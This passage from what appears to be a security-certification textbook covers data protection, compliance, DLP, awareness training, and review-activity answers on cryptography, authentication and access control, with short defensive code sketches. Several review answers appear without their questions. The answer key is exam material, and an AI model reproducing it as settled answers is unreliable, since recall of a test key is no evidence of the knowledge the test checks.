for handling the data responsibly. The focus is on safeguarding privacy rights and
ensuring data protection rather than assigning ownership in the traditional sense.
Organizational Consequences
A data or privacy breach can have severe organizational consequences:
• Reputation damage—data breaches cause widespread negative publicity, and
customers are less likely to trust a company that cannot secure its information
assets.
• Identity theft—if the breached data is exploited to perform identity theft, the
data subject may be able to sue for damages.
• IP theft—loss of company data can lead to loss of revenue. This typically occurs
when copyright material—unreleased movies and music tracks—is breached.
The loss of patents, designs, trade secrets, and so on to competitors or state
actors can also cause commercial losses, especially in overseas markets where IP
theft may be difficult to remedy through legal action.
Notifications of Breaches
The requirements for different types of breach are set out in law and/or in
regulations. The requirements indicate who must be notified. A data breach can
mean the loss or theft of information, the accidental disclosure of information,
or the loss or damage of information. Note that there are substantial risks
from accidental breaches if effective procedures are not in place. If a database
administrator can run a query that shows unredacted credit card numbers, that is a
data breach, regardless of whether the query ever leaves the database server.
Escalation
A breach may be detected by technical staff, and if the event is considered minor,
there may be a temptation to remediate the system and take no further notification
action. This could place the company in legal jeopardy. Any breach of personal data
and most breaches of IP should be escalated to senior decision-makers and any
impacts from legislation and regulation properly considered.
Compliance
Security compliance refers to organizations’ adherence to applicable security
standards, regulations, and best practices to protect sensitive information, mitigate
risks, and ensure data confidentiality, integrity, and availability. Effective compliance
necessitates establishing and implementing policies, procedures, controls, and
technical measures to meet the requirements set forth by regulatory bodies,
industry standards, and legal obligations.
Impacts of Noncompliance
Noncompliance with data protection laws and regulations can have severe
consequences for organizations. The consequences vary depending on jurisdiction
and the specific regulations violated. Common ramifications for noncompliance
include legal sanctions such as financial penalties, legal liabilities, reputational
damage, and loss of customer trust. Sanctions refer to penalties, disciplinary
actions, or measures imposed due to noncompliance with laws, regulations, or
rules. Sanctions are enforced by governing bodies, regulatory authorities, or
organizations overseeing the specific domain in which the noncompliance occurred.
Regulatory agencies may impose substantial fines, which can amount to millions or
even billions of dollars, depending on the severity of the violation. Legal action from
affected individuals or data subjects may lead to costly lawsuits and settlements.
Noncompliance can harm an organization’s reputation, eroding customer trust,
decreasing business opportunities, and potentially losing contracts or partnerships.
Organizations may also face additional regulatory scrutiny, including increased
audits, investigations, or mandated remediation measures. Organizations must
prioritize data protection compliance, implement appropriate security measures,
conduct regular risk assessments, and stay informed about evolving data protection
laws and regulations to avoid these consequences.
Due diligence in the context of data protection describes the comprehensive assessment
and evaluation of an organization's data protection practices and measures. It involves
examining and verifying the adequacy of data security controls, privacy policies, data
handling procedures, and compliance with applicable laws and regulations.
Software Licensing
Noncompliance with software licensing requirements can result in the revocation
of usage rights and other consequences such as fines. Violations of license
agreements, such as exceeding permitted installations, unauthorized sharing, or
other unauthorized usage, constitute contractual noncompliance. Other forms
of noncompliance include breaching license terms, such as modifying code or
distributing software without authorization. In response, software vendors or
licensing authorities may revoke or suspend licenses and take other legal actions.
The loss of software licenses can disrupt business operations, causing inefficiencies
and workflow interruptions, and can also cause significant reputational damage.
To ensure compliance, organizations can rectify noncompliance through license
remediation, proper license management, and audits.
Compliance Monitoring
Compliance with legal and regulatory requirements, industry standards, and
internal policies can be ensured through diligent monitoring of an organization’s
actions. This involves conducting thorough investigations and assessments of third
parties, such as vendors or business partners, to ensure they comply with relevant
regulations.
Moreover, taking reasonable precautions and implementing necessary controls to
protect sensitive information and prevent noncompliance is essential. Attestation
and acknowledgment are also integral to compliance monitoring, requiring
individuals or entities to formally acknowledge their understanding of compliance
obligations and commitment to adhere to them through signed agreements, policy
acknowledgments, and training activities. This provides evidence of an individual
or organization’s commitment to compliance and serves as the foundation for
monitoring and enforcement. Compliance monitoring can be conducted internally
or externally, with self-assessments, internal audits, and reviews conducted
internally and independent audits, assessments, or regulatory inspections
conducted externally. Automation is vital in compliance monitoring, with
compliance management software being a critical tool in data collection, analysis,
and reporting. Automation streamlines monitoring activities, improves accuracy,
and enhances the ability to detect noncompliance or anomalies promptly.
Data Protection
Classifying data as “at rest,” “in motion,” and “in use” is crucial for effective data
protection and security measures. By analyzing data based on its state (at rest,
in motion, in use), organizations can tailor security measures and controls
to address the specific risks and requirements associated with each data
state. This classification helps organizations identify vulnerabilities, prioritize
security investments, and ensure appropriate safeguards to protect sensitive
data throughout its lifecycle. It also facilitates compliance with data protection
regulations and industry best practices.
• Data at rest—this state means that the data is in some sort of persistent
storage media. Examples of types of data that may be at rest include financial
information stored in databases, archived audiovisual media, operational
policies and other management documents, system configuration data, and
more. In this state, it is usually possible to encrypt the data, using techniques
such as whole disk encryption, database encryption, and file- or folder-level
encryption. It is also possible to apply permissions—access control lists (ACLs)—
to ensure only authorized users can read or modify the data. ACLs can be
applied only if access to the data is fully mediated through a trusted OS.
• Data in transit (or data in motion)—this is the state when data is transmitted
over a network. Examples of types of data that may be in transit include
website traffic, remote access traffic, data being synchronized between cloud
repositories, and more. In this state, data can be protected by a transport
encryption protocol, such as TLS or IPSec.
With data at rest, there is a greater encryption challenge than with data in transit as the
encryption keys must be kept secure for longer. Transport encryption can use ephemeral
(session) keys.
• Data in use (or data in processing)—this is the state when data is present in
volatile memory, such as system RAM or CPU registers and cache. Examples of
types of data that may be in use include documents open in a word processing
application, database data that is currently being modified, event logs being
generated while an operating system is running, and more. When a user works
with data, that data usually needs to be decrypted as it moves from at rest to in
use. The data may stay decrypted for an entire work session, which puts it at
risk. However, trusted execution environment (TEE) mechanisms, such as Intel
Software Guard Extensions (software.intel.com/content/www/us/en/develop/
topics/software-guard-extensions/details.html), are able to encrypt data as it
exists in memory, so that an untrusted process cannot decode the information.
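The at rest/in use distinction can be made concrete with a deliberately simplified sketch: ciphertext is what sits on disk, and plaintext exists only while being processed. The hash-derived keystream below is a toy for illustration only and is NOT real cryptography; production code would use a vetted cipher such as AES-GCM from an established library:

```python
import hashlib

# Toy keystream cipher (illustration only, not secure): derive a
# pseudorandom byte stream from a key, then XOR it with the data.

def keystream(key: bytes, n: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def xor_cipher(data: bytes, key: bytes) -> bytes:
    # XOR is symmetric: the same call encrypts and decrypts.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

key = b"storage-key"
at_rest = xor_cipher(b"account balance: 100", key)  # ciphertext on disk
in_use = xor_cipher(at_rest, key)                   # decrypted for processing
assert in_use == b"account balance: 100"
assert at_rest != in_use
```

The window during which `in_use` holds plaintext in RAM is exactly the exposure that TEE mechanisms such as SGX aim to close.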
• Tokenization—tokenization replaces sensitive data with a randomly generated
token while securely storing the original data in a separate location. Tokens have
no meaningful value, reducing the risk of unauthorized access or exposure of
sensitive information. A common use case for data tokenization is in payment
processing systems. When customers make a payment, their sensitive payment
card information, such as credit card numbers, is replaced with a randomly
generated token. This token is then used to represent the payment card data
during transactions and is stored in the system’s database.
• Obfuscation—obfuscation involves modifying data to make it difficult to
understand or reverse engineer without altering functionality. Software
development commonly uses obfuscation techniques to protect source code
intellectual property and prevent unauthorized access to critical details. Examples
of obfuscation include data masking, data type conversion, and hashing.
• Segmentation—segmentation secures data by dividing networks, data, and
applications into isolated components to improve sensitive data protection, limit
the impact of a breach, and improve network security. Segmentation restricts
access based on user roles, privileges, location, or other criteria, granting access
only to the specific data segments required for authorized users or processes. A
common use case for data segmentation is in healthcare systems or electronic
health records (EHRs). Patient data in these systems is often categorized and
segmented based on factors such as medical conditions, departments, or access
levels. Data segmentation allows healthcare professionals to control and limit
access to sensitive patient information based on the principle of least privilege:
different healthcare providers, specialists, or departments may have access only
to the specific patient data relevant to their roles or treatment responsibilities.
• Permission restrictions—permission restrictions control access to data based
on user permissions, ensuring that only authorized individuals or roles can view,
modify, or interact with specific data elements and reducing the risk of
unauthorized access, data breaches, or accidental misuse. Access control lists,
role-based access control, rule-based access control, mandatory access control,
attribute-based access control, and other methods enforce the principle of least
privilege.
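Tokenization and masking (a form of obfuscation) can be sketched in a few lines. The in-memory token vault below is a hypothetical stand-in; real systems keep the vault in a hardened, separately secured service:

```python
import secrets

VAULT = {}  # token -> original value, held in a separate store

def tokenize(pan: str) -> str:
    """Replace a card number with a random token of no intrinsic value."""
    token = secrets.token_hex(8)
    VAULT[token] = pan
    return token

def detokenize(token: str) -> str:
    """Authorized lookup of the original value from the vault."""
    return VAULT[token]

def mask(pan: str) -> str:
    """Obfuscate for display: reveal only the last four digits."""
    return "*" * (len(pan) - 4) + pan[-4:]

t = tokenize("4111111111111111")
assert detokenize(t) == "4111111111111111"
assert mask("4111111111111111") == "************1111"
```

Note the difference in reversibility: the token is only reversible via the vault, the mask is not reversible at all, and a hash (another obfuscation example) would be deliberately one-way.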
• Endpoint agents—to enforce policy on client computers, even when they are
not connected to the network.
DLP agents scan content in structured formats, such as a database with a formal
access control model, or unstructured formats, such as email or word processing
documents. A file cracking process is applied to unstructured data to render it in
a consistent scannable format. The transfer of content to removable media, such
as USB devices, or by email, instant messaging, or even social media, can then
be blocked if it does not conform to a predefined policy. Most DLP solutions can
extend the protection mechanisms to cloud storage services, using either a proxy to
mediate access or the cloud service provider’s API to perform scanning and policy
enforcement.
Creating a DLP policy in Office 365. (Screenshot used with permission from Microsoft.)
Remediation is the action the DLP software takes when it detects a policy violation.
The following remediation mechanisms are typical:
• Alert only—the copying is allowed, but the management system records an
incident and may alert an administrator.
• Block—the user is prevented from copying the original file but retains access to
it. The user may or may not be alerted to the policy violation, but it will be logged
as an incident by the management engine.
• Quarantine—access to the original file is denied to the user (or possibly any
user). This might be accomplished by encrypting the file in place or by moving it
to a quarantine area in the file system.
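The remediation choices above can be sketched as a simple dispatch. The content pattern and the returned fields are illustrative assumptions, not any vendor's DLP API:

```python
import re

# Hypothetical policy: a bare 16-digit number is treated as a card number.
CARD_PATTERN = re.compile(r"\b\d{16}\b")

def remediate(content: str, action: str) -> dict:
    """Apply a DLP remediation action to content being copied."""
    violation = bool(CARD_PATTERN.search(content))
    if not violation:
        return {"allowed": True, "incident": False}
    if action == "alert":        # copy allowed, incident logged
        return {"allowed": True, "incident": True}
    if action == "block":        # copy prevented, user keeps file access
        return {"allowed": False, "incident": True}
    if action == "quarantine":   # access to the original file denied
        return {"allowed": False, "incident": True, "quarantined": True}
    raise ValueError(f"unknown action: {action}")

assert remediate("hello", "block") == {"allowed": True, "incident": False}
assert remediate("pan 4111111111111111", "alert")["incident"] is True
```

A production engine would additionally run file cracking on unstructured formats before matching, as described above.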
Review Activity:
Data Classification and Compliance
labeling project?
database for a hobbyist site with a global audience. The site currently
collects account details with no further information. What should be
added to be in compliance with data protection regulations?
5. This state means that the data is in some sort of persistent storage
media.
Topic 16B
Personnel Policies
Conduct Policies
Operational policies include privilege/credential management, data handling,
and incident response. Other important security policies include those governing
employee conduct and respect for privacy.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
• Site security procedures, restrictions, and advice, including safety drills, escorting
guests, use of secure areas, and use of personal devices.
• Password and account management plus security features of PCs and mobile
devices.
• Secure use of software such as browsers and email clients plus appropriate use
of Internet access, including social networking sites.
CBT might use video game elements to improve engagement. For example,
students might win badges and level-up bonuses such as skills or digitized loot to
improve their in-game avatar. Simulations might be presented so that the student
chooses encounters from a map and engages with a simulation environment in a
first-person shooter style 3D world.
• Social Engineering—social engineering training raises awareness of common
social engineering tactics employed by attackers, such as phishing, pretexting,
or baiting. It helps individuals recognize and avoid falling victim to these
manipulative techniques, encouraging skepticism and critical thinking when
interacting with unknown or suspicious requests.
• Operational Security—operational security training focuses on promoting good
security practices in day-to-day operations. It covers physical security,
workstation security, data classification, secure communications, and incident
reporting to help users understand their role in preventing security incidents.
• Hybrid/Remote Work Environments—hybrid/remote work training addresses
the unique security challenges associated with working from home or outside
the traditional office environment. It covers topics such as secure remote
access, secure Wi-Fi usage, protecting physical workspaces, and maintaining
data security while working remotely.
Training employees about safe computer use is critical to protecting data and mitigating
the risks associated with cyberattacks. (Image by rawpixel © 123RF.com.)
Phishing Campaigns
Phishing campaigns used as employee training mechanisms involve simulated
attacks to raise awareness and educate employees about the risks and
consequences of falling victim to such attacks. By conducting mock phishing
exercises, organizations aim to enhance threat awareness, protect sensitive
information, mitigate social engineering risks, promote incident response, and
strengthen security practices. Phishing attacks are prevalent and pose significant
risks to many industries, making it essential for employees to know how to defend
against them. Phishing is an effective attack vector due to its exploitation of
human vulnerabilities, deceptive impersonation of trusted entities, psychological
manipulation, broad reach, ease of use, dynamic capabilities, adaptability, and
the potential for significant financial gain. These factors make phishing attacks
difficult to detect and mitigate, and they underscore the importance of practicing
vigilance and regularly training employees to recognize and respond effectively to
phishing attempts.
Through training, employees become more aware of common phishing techniques
and deceptive tactics used by cybercriminals. This knowledge helps them to
identify and report suspicious emails or messages, reducing the likelihood of data
breaches and unauthorized access to sensitive information. By training employees
to recognize phishing attempts, organizations mitigate social engineering risks.
Employees learn to identify messages that use common tactics such as urgent
requests, spoofed identities, and enticing offers to manipulate individuals. This
knowledge helps protect employees and their organization from disclosing
credentials or confidential data, or installing malware. Effective training enables
employees to respond appropriately to phishing attempts, such as reporting
incidents to specific IT or security teams, refraining from clicking suspicious links
or opening attachments, and verifying requests sent via email using alternative
channels. Training employees to recognize and respond to phishing attempts
strengthens an organization’s cybersecurity defenses. It cultivates a culture of
security awareness, empowers employees to protect sensitive information actively,
and enhances the organization’s resilience against evolving threats. Complemented
by simulated phishing campaigns, regular training programs help build a
knowledgeable and security-conscious workforce.
Anomalous Behavior
Anomalous behavior recognition refers to identifying actions or patterns that
deviate significantly from expected behavior. Examples include unusual network traffic, user
account activity anomalies, insider threat actions, abnormal system events, and
fraudulent transactions. Techniques such as network intrusion detection, user
behavior analytics, system log analysis, and fraud detection are utilized to identify
anomalous behavior. These techniques require monitoring and analyzing different
data sources, comparing observed behavior against established baselines, and
utilizing machine learning algorithms to detect deviations.
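The baseline-comparison idea can be shown with the simplest possible detector: flag an observation whose z-score against historical behavior exceeds a threshold. The login counts and the threshold are illustrative assumptions; real user behavior analytics uses far richer models:

```python
import statistics

# A user's established baseline: daily login counts over recent history.
baseline_logins_per_day = [4, 5, 6, 5, 4, 5, 6, 5]

def is_anomalous(observed: float, history: list, threshold: float = 3.0) -> bool:
    """Flag observations more than `threshold` standard deviations
    from the historical mean."""
    mean = statistics.mean(history)
    stdev = statistics.stdev(history)
    return abs(observed - mean) / stdev > threshold

assert not is_anomalous(6, baseline_logins_per_day)
assert is_anomalous(40, baseline_logins_per_day)  # e.g., credential stuffing
```

The same compare-against-baseline structure underlies network intrusion detection and fraud detection; machine learning replaces the fixed z-score with learned models of normal behavior.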
The first phase is assessing the organization’s security needs and risks. Planning
and designing awareness training activities follow, where a comprehensive plan
is developed, including objectives, topics, and delivery methods. Once a plan is
created, the development stage focuses on creating engaging and informative
training materials. Training is then delivered through previously identified delivery
methods, such as in-person or computer-based sessions. Evaluation and feedback
activities assess the training’s effectiveness and gather participant insights.
Security awareness is reinforced via recurring training activities to ensure it
remains a priority and often includes refresher training, reminders, newsletters,
and awareness campaigns. Monitoring and adaptation allow organizations to
continually evaluate the program’s impact and make necessary adjustments
based on emerging risks and changing requirements. Organizations can establish
a continuous and effective security awareness training program by following this
lifecycle. It helps enhance employee knowledge, steer behaviors, and cultivate a
security-conscious culture.
Review Activity:
Importance of Personnel Policies
Lesson 16
Summary
You should be able to explain the importance of data governance policies and tools
to mitigate the risk of data breaches and privacy breaches and implement security
solutions for data protection.
• Assign roles to ensure the proper management of data within its lifecycle.
• Use policies and procedures that hinder social engineers from eliciting
information or obtaining unauthorized access.
• Use training and education programs to help employees maintain the safety
and security of the organization’s data assets.
2. What term is used to describe the property of a secure network where a sender cannot deny
having sent a message?
Non-repudiation
Gap analysis
4. What process within an access control framework logs actions performed by subjects?
Accounting
Authorization means granting the account that has been configured for the user on the computer system
the right to make use of a resource. Authorization manages the privileges granted on the resource.
Authentication protects the validity of the user account by testing that the person accessing that account is
who they say they are.
A user’s actions are logged on the system. Each user is associated with a unique computer account. As
long as the user’s authentication is secure and the logging system is tamperproof, they cannot deny having
performed the action.
1. You have implemented a secure web gateway that blocks access to a social networking site.
How would you categorize this type of security control?
2. A company has installed motion-activated floodlighting on the grounds around its premises.
It would be classed as a physical control, and its function is both detecting and deterring.
3. A firewall appliance intercepts a packet that violates policy. It automatically updates its access
control list to block all further packets from the source IP. What TWO functions did the security
control perform?
4. If a security control is described as operational and compensating, what can you determine
about it?
The control is enforced by a person rather than a technical system, and the control has been developed to
replicate the functionality of a primary control, as required by a security standard.
5. A multinational company manages a large amount of valuable intellectual property (IP) data,
plus personal data for its customers and account holders. What type of business unit can be
used to manage such important and complex security requirements?
6. A business is expanding rapidly, and the owner is worried about tensions between its
established IT and programming divisions. What type of security business unit or function could
help to resolve these issues?
Development and operations (DevOps) is a cultural shift within an organization to encourage more
collaboration between developers and systems administrators. DevSecOps embeds the security function
within these teams as well.
Review Activity: Threat Actors
1. Which of the following would be assessed by likelihood and impact: vulnerability, threat, or risk?
Risk. To assess likelihood and impact, you must identify both the vulnerability and the threat posed by a
potential exploit.
False. Nation-state actors have targeted commercial interests for theft, espionage, and extortion.
3. You receive an email with a screenshot showing a command prompt at one of your application
servers. The email suggests you engage the hacker for a day’s consultancy to patch the
vulnerability. How should you categorize this threat?
If the consultancy is refused and the hacker takes no further action, it can be classed as for financial gain
only. If the offer is declined and the hacker then threatens to sell the exploit or to publicize the vulnerability,
then the motivation is criminal.
4. Which type of threat actor is primarily motivated by the desire for political change?
Hacktivist
5. Which three types of threat actor are most likely to have high levels of funding?
Solutions
Review Activity: Attack Surfaces
1. A company uses stock photos from a site distributing copyright-free media to illustrate its
websites and internal presentations. Subsequently, one of the company’s computers is found
infected with malware that was downloaded by code embedded in the headers of a photo file
obtained from the site. What threat vector(s) does this attack use?
The transmission vector is image based, and the use of a site known to be used by the organization makes
this a supply chain vulnerability (even though the images are not paid for). It’s not stated explicitly, but the
attack is also likely to depend on a vulnerability in the software used to download and/or view or edit the
photo.
This is a supply chain vulnerability, specifically arising from the company’s managed service provider (MSP).
3. A company uses cell phones to provide IT support to its remote employees, but it does not
maintain an authoritative directory of contact numbers for support staff. Risks from which
specific threat vector are substantially increased by this oversight?
Voice calls: the risk that threat actors could impersonate IT support personnel to trick employees into
revealing confidential information or installing malware.
Review Activity: Social Engineering
1. The help desk takes a call, and the caller states that she cannot connect to the e-commerce
website to check her order status. She would also like a username and password. The user
gives a valid customer company name but is not listed as a contact in the customer database.
The user does not know the correct company code or customer ID. Is this likely to be a social
engineering attempt, or is it a false alarm?
This is likely to be a social engineering attempt. The help desk should not give out any information or add an
account without confirming the caller’s identity.
2. A purchasing manager is browsing a list of products on a vendor’s website when a window opens
claiming that antimalware software has detected several thousand files on their computer that
are infected with viruses. Instructions in the official-looking window indicate the user should
click a link to install software that will remove these infections. What type of social engineering
attempt is this, or is it a false alarm?
This is a social engineering attempt utilizing a watering hole attack and brand impersonation.
3. Your CEO calls to request market research data immediately be forwarded to their personal
email address. You recognize their voice, but a proper request form has not been filled out and
use of third-party email is prohibited. They state that normally they would fill out the form and
should not be an exception, but they urgently need the data to prepare for a roundtable at a
conference they are attending. What type of social engineering techniques could this use, or is it
a false alarm?
If social engineering, this is a CEO fraud phishing attack over a voice channel (vishing). It is possible that it
uses deep fake technology for voice mimicry. The use of a sophisticated attack for a relatively low-value data
asset seems unlikely, however. A fairly safe approach would be to contact the CEO back on a known mobile
number.
4. A company policy states that any wire transfer above a certain value must be authorized by two
employees, who must separately perform due diligence to verify invoice details. What specific
type of social engineering is this policy designed to mitigate?
Review Activity: Cryptographic Algorithms
1. Which part of a simple cryptographic system must be kept secret—the cipher, the ciphertext, or
the key?
In cryptography, the security of the message is guaranteed by the security of the key. The system does not
depend on hiding the algorithm or the message (security by obscurity).
2. Considering that cryptographic hashing is one way and the digest cannot be reversed, what
uses does hashing have in cryptography?
Because two parties can hash the same data and compare digests to see if they match, hashing can be used
for data verification in a variety of situations, including password authentication. Hashes of passwords,
rather than the password plaintext, can be stored securely or exchanged for authentication. A hash of a file
or a hash code in an electronic message can be verified by both parties.
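For example, digest comparison can be demonstrated with Python's standard hashlib (an illustrative sketch; the message contents are invented):

```python
import hashlib

def digest(data):
    """SHA-256 digest of the data as a hex string."""
    return hashlib.sha256(data).hexdigest()

# Both parties hash the same message and compare digests.
message = b"Wire $10,000 to account 12345"
sender_digest = digest(message)
receiver_digest = digest(message)
print(sender_digest == receiver_digest)  # True: message unaltered

# Any change to the data produces a completely different digest.
tampered = b"Wire $90,000 to account 99999"
print(digest(tampered) == sender_digest)  # False
```

This is the same mechanism used for password verification: the server stores a digest and compares it against the digest of whatever the user submits.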
Confidentiality—symmetric ciphers are generally fast and well suited to bulk encrypting large amounts of
data.
Each key can reverse the cryptographic operation performed by its pair but cannot reverse an operation
performed by itself. The private key must be kept secret by the owner, but the public key is designed to be
widely distributed. The private key cannot be determined from the public key, given a sufficient key size.
A hashing function is used to create a message digest. The digest is then signed using the sender’s private
key. The resulting signature can be verified by the recipient using the sender’s public key and cannot be
modified by any other agency. The recipient can calculate their own digest of the message and compare it to
the signed hash to validate that the message has not been altered.
Review Activity: Public Key Infrastructure
In most cases, the subject generates a key pair, adds the public key along with subject information and
certificate type in a certificate signing request (CSR), and submits it to the CA. If the CA accepts the request, it
generates a certificate with the appropriate key usage and validity, signs it, and transmits it to the subject.
The subject’s public key and the algorithms used for encryption and hashing. The certificate also stores a
digital signature from the issuing CA, establishing the chain of trust.
3. What extension field is used with a web server certificate to support the identification of the
server by multiple specific subdomain labels?
The subject alternative name (SAN) field. A wildcard certificate will match any subdomain label.
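For illustration, single-label wildcard matching can be sketched as follows. This is a simplified sketch; real certificate name validation (per RFC 6125) involves additional rules, and the hostnames are hypothetical:

```python
def wildcard_matches(pattern, hostname):
    """Check a wildcard certificate name against a hostname.
    `*` matches exactly one leftmost subdomain label."""
    p_labels = pattern.lower().split(".")
    h_labels = hostname.lower().split(".")
    if len(p_labels) != len(h_labels):
        return False
    return all(p == "*" or p == h for p, h in zip(p_labels, h_labels))

print(wildcard_matches("*.example.com", "www.example.com"))  # True
print(wildcard_matches("*.example.com", "example.com"))      # False: no label to match
print(wildcard_matches("*.example.com", "a.b.example.com"))  # False: two labels deep
```

This is why a SAN field listing each specific subdomain is needed when a single wildcard level is not sufficient.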
4. What are the potential consequences if a company loses control of a private key?
It puts both data confidentiality and identification and authentication systems at risk. Depending on the key
usage, the key may be used to decrypt data with authorization. The key could also be used to impersonate a
user or computer account.
5. You are advising a customer about encryption for data backup security and the key escrow
services that you offer. How should you explain the risks of key escrow and potential
mitigations?
Escrow refers to archiving the key used to encrypt the customer’s backups with your company as a third
party. The risk is that an insider attack from your company may be able to decrypt the data backups.
This risk can be mitigated by requiring M-of-N access to the escrow keys, reducing the risk of a rogue
administrator.
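The M-of-N principle can be illustrated with a minimal sketch (this models only the approval check, not a real escrow system; the custodian names are hypothetical):

```python
def escrow_release(approvals, authorized, m=2):
    """M-of-N control: release the escrowed key only if at least
    `m` distinct authorized custodians approve."""
    valid = set(approvals) & set(authorized)
    return len(valid) >= m

custodians = {"alice", "bob", "carol"}  # N = 3 key custodians
print(escrow_release({"alice"}, custodians))         # False: one approver is not enough
print(escrow_release({"alice", "bob"}, custodians))  # True: 2 of 3 approved
```

Production systems typically enforce this cryptographically, for example by splitting the key with a secret-sharing scheme, rather than with a simple policy check.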
Either a published certificate revocation list (CRL) or an Online Certificate Status Protocol (OCSP) responder
7. You are providing consultancy to a firm to help them implement smart card authentication to
premises networks and cloud services. What are the main advantages of using an HSM over
server-based key and certificate management services?
A hardware security module (HSM) is optimized for this role and so presents a smaller attack surface. It
is designed to be tamper evident to mitigate against insider threat risks. It is also likely to have a better
implementation of a random number generator, improving the security properties of key material.
Review Activity: Cryptographic Solutions
1. In an FDE product, what type of cipher is used for a key encrypting key?
Full-disk encryption (FDE) uses a secret symmetric key to perform bulk encryption of a disk. This data
encryption key (DEK) is protected by a Key Encryption Key (KEK). The KEK is an asymmetric cipher (RSA or
ECC) private key.
2. True or False? Perfect Forward Secrecy (PFS) ensures that a compromise of a server's private key
will not also put copies of traffic sent to that server in the past at risk of decryption.
True. PFS ensures that ephemeral keys are used to encrypt each session. These keys are destroyed after use.
Diffie-Hellman allows the sender and recipient to derive the same value (the session key) from some other
pre-agreed values. Some of these are exchanged, and some kept private, but there is no way for a snooper
to work out the secret just from the publicly exchanged values. This means session keys can be created
without relying on the server’s private key and that it is easy to generate ephemeral keys that are different
for each session.
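The exchange can be illustrated with toy numbers (a sketch only; real Diffie-Hellman uses very large primes or elliptic curves, and the private values here are arbitrary examples):

```python
# Toy Diffie-Hellman key agreement with tiny numbers.
p, g = 23, 5            # public values: prime modulus and generator

a = 6                   # Alice's private value (never transmitted)
b = 15                  # Bob's private value (never transmitted)

A = pow(g, a, p)        # Alice sends A = g^a mod p
B = pow(g, b, p)        # Bob sends B = g^b mod p

# Each side combines its own secret with the other's public value.
alice_key = pow(B, a, p)
bob_key = pow(A, b, p)
print(alice_key == bob_key)  # True: shared session key, never sent over the wire
```

A snooper sees only p, g, A, and B; with realistically large values, recovering the shared key from those is computationally infeasible.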
4. True or false? It is essential to keep a salt value completely secret to prevent recovery of a
password from its hash.
False. The salt does not have to be kept secret, though it should be generated randomly.
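Salted password storage can be sketched with Python's standard hashlib (an illustrative sketch; the iteration count here is kept low for speed and the passwords are invented examples):

```python
import hashlib
import os

def hash_password(password, salt=None, iterations=100_000):
    """Salted hash using PBKDF2-HMAC-SHA256. The salt is random but
    not secret; it is stored alongside the digest."""
    if salt is None:
        salt = os.urandom(16)  # unique random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify(password, salt, stored):
    return hash_password(password, salt)[1] == stored

salt, stored = hash_password("correct horse battery staple")
print(verify("correct horse battery staple", salt, stored))  # True
print(verify("wrong guess", salt, stored))                   # False

# Identical passwords hash to different values because the salts differ,
# which defeats precomputed (rainbow table) attacks.
print(hash_password("hunter2")[1] != hash_password("hunter2")[1])  # True
```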
Review Activity: Authentication
1. Which property of a plaintext password is most effective at defeating a brute force attack?
The length of the password. If the password does not have any complexity (if it is just two dictionary words,
for instance), it may still be vulnerable to a dictionary-based attack. A long password may still be vulnerable if
the output space is small or if the mechanism used to hash the password is faulty.
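The effect of length versus complexity can be quantified with the keyspace formula, entropy = length × log2(alphabet size). A quick sketch:

```python
import math

def keyspace_bits(alphabet_size, length):
    """Entropy in bits of a randomly chosen password:
    log2(alphabet_size ** length)."""
    return length * math.log2(alphabet_size)

# Short complex password: 8 characters from ~94 printable symbols.
print(round(keyspace_bits(94, 8)))   # ~52 bits
# Long simple password: 20 lowercase letters only.
print(round(keyspace_bits(26, 20)))  # ~94 bits
```

The longer, simpler password has a far larger keyspace, which is why length is the dominant factor against brute force (assuming the password is chosen randomly rather than from dictionary words).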
2. A user maintains a list of commonly used passwords in a file located deep within the computer’s
directory structure. Is this secure password management?
No. This is security by obscurity. The file could probably be easily discovered using search tools.
Enforce password history/block reuse and set a minimum age to prevent users from quickly cycling through
password changes to revert to a preferred phrase.
4. True or false? An account requiring a password, PIN, and smart card is an example of
three-factor authentication.
False. A password and a PIN are both knowledge factors, so this combines only two factors
(something you know and something you have).
You can query the location service running on a device or geolocation by IP. You could use location with the
network, based on switch port, wireless network name, virtual LAN (VLAN), or IP subnet.
6. Apart from cost, what would you consider to be the major considerations for evaluating a
biometric recognition technology?
Error rates (false acceptance and false rejection), throughput, and whether users will accept the technology
or reject it as too intrusive or threatening to privacy.
7. True or false? When implementing smart card login, the user’s private key is stored on the smart
card.
True. The smart card implements a cryptoprocessor for secure generation and storage of key and certificate
material.
A one-time password mechanism generates a token that is valid only for a short period (usually 60 seconds),
before it changes again. This can be sent to a registered device or generated by a hard token device. This
sort of two-step verification means that a threat actor cannot simply use the compromised password to
access the user’s account.
Review Activity: Authorization
1. What is the difference between security group- and role-based permissions management?
A group is simply a container for several user objects. Any organizing principle can be applied. In a role-
based access control system, groups are tightly defined according to job functions. Also, a user should
(logically) only possess the permissions of one role at a time.
2. In a rule-based access control model, can a subject negotiate with the data owner for access
privileges? Why or why not?
This sort of negotiation would not be permitted under rule-based access control; it is a feature of
discretionary access control.
3. What is the process of ensuring accounts are only created for valid users, only assigned the
appropriate privileges, and that the account credentials are known only to the valid user?
Provisioning or onboarding
4. What is the policy that states users should be allocated the minimum sufficient permissions?
Least privilege
5. A threat actor was able to compromise the account of a user whose employment had been
terminated a week earlier. They used this account to access a network share and exfiltrate
important files. What account vulnerability enabled this attack?
While it’s possible that lax password requirements and incorrect privileges may have contributed to
the account compromise, the most glaring problem is that the terminated employee’s account wasn't
deprovisioned. Since the account was no longer being used, it should not have been left active for a threat
actor to exploit.
Review Activity: Identity Management
A Lightweight Directory Access Protocol (LDAP)-compatible directory stores information about network
resources and users in a format that can be accessed and updated using standard queries.
True
3. True or false? In order to create a service ticket, Kerberos passes the user’s password to the
target application server for authentication.
False. Only the KDC verifies the user credential. The Ticket Granting Service (TGS) sends the user’s account
details (SID) to the target application for authorization (allocation of permissions), not authentication.
4. You are consulting with a company about a new approach to authenticating users. You suggest
there could be cost savings and better support for multifactor authentication (MFA) if your
employees create accounts with a cloud provider. That allows the company’s staff to focus on
authorizations and privilege management. What type of service is the cloud vendor performing?
5. You are working on a cloud application that allows users to log on with social media accounts
over the web and from a mobile application. Which protocols would you consider, and which
would you choose as most suitable?
Security Assertion Markup Language (SAML) and OAuth. OAuth offers better support for standard mobile
apps so is probably the best choice.
Review Activity: Enterprise Network Architecture
1. A company’s network contains client workstations and database servers in the same subnet.
Recently, this has enabled attackers to breach the security of the database servers from a
workstation compromised by phishing malware. The company has improved threat awareness
training and upgraded antivirus software on workstations. What other change will improve the
